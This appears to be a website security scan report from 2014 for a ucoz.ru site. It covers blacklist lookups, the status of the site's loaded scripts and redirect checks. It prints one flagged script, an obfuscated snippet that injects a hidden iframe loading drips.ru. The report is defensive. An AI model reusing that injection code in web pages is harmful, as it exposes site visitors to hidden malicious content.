Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=verniedruzaj.ucoz.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://verniedruzaj.ucoz.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://verniedruzaj.ucoz.ru/ | 200 OK Content-Length: 121440 Content-Type: text/html | clean |
http://s55.ucoz.net/src/jquery-1.7.2.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://s55.ucoz.net/src/ulightbox/ulightbox.js | 200 OK Content-Length: 22618 Content-Type: text/javascript | clean |
http://s55.ucoz.net/src/uwnd.js?2 | 200 OK Content-Length: 228554 Content-Type: text/javascript | clean |
http://www.topglobus.ru/js/smilesr.js | 200 OK Content-Length: 484 Content-Type: application/x-javascript | clean |
http://drips.ru/slider.js | 200 OK Content-Length: 189 Content-Type: application/javascript | suspicious |
Suspicious code. Script contains iFrame. var l = document; var wishyhd = l.getElementsByTagName('he' + 'ad')[0]; var emptiestag = l.createElement('ifr' + 'ame'); emptiestag.src = 'http://drips.ru'; wishyhd.appendChild(emptiestag); | ||
http://bambun.ru/css_js/translate.js | 200 OK Content-Length: 81 Content-Type: application/x-javascript | clean |
http://xall-pc.ru/up.js | 500 Can't connect to xall-pc.ru:80 (Bad hostname) Content-Length: 152 Content-Type: text/plain | clean |
http://xall-pc.ru/test404page.js | 500 Can't connect to xall-pc.ru:80 (Bad hostname) Content-Length: 152 Content-Type: text/plain | clean |
http://rusobr.ru/count.php?sid=13234 | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://101widgets.com/00019611/164/304 | 200 OK Content-Length: 256 Content-Type: text/html | clean |
http://jg.revolvermaps.com/2/1.js?i=6y6dc8jowvv&s=182&m=0&v=true&r=false&b=000000&n=true&c=57caff | 200 OK Content-Length: 2146 Content-Type: application/javascript | clean |
http://csomsk.ru/1-ucoz/rip/statistika.js | 200 OK Content-Length: 387 Content-Type: text/javascript | clean |
http://bestsoftware.ucoz.org/Blogi/Torrent-56rus.js | 200 OK Content-Length: 3459 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: verniedruzaj.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Sep 2014 14:02:33 GMT
Server: uServ/3.2.2
Content-Length: 121440
Content-Type: text/html; charset=UTF-8
...121440 bytes of data.
GET / HTTP/1.1
Host: verniedruzaj.ucoz.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 19 Sep 2014 14:02:33 GMT
Server: uServ/3.2.2
Content-Length: 121440
Content-Type: text/html; charset=UTF-8
...121440 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: verniedruzaj.ucoz.ru
Referer: http://www.google.com/search?q=verniedruzaj.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: verniedruzaj.ucoz.ru
Referer: http://www.google.com/search?q=verniedruzaj.ucoz.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.